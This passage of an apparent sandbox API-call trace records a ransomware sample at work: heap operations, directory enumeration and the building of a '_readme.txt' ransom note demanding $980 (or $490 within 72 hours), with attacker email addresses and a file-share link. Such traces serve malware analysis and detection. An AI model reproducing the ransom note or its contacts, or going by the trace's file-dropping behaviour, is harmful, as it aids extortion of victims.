dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.528] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0227.528] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.528] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.528] PathFindFileNameW (pszPath="") returned="" [0227.528] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.529] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.529] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.529] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.529] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0227.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.529] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0227.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.530] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.530] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.530] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.530] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.531] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.531] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.531] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.531] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.531] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.531] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, 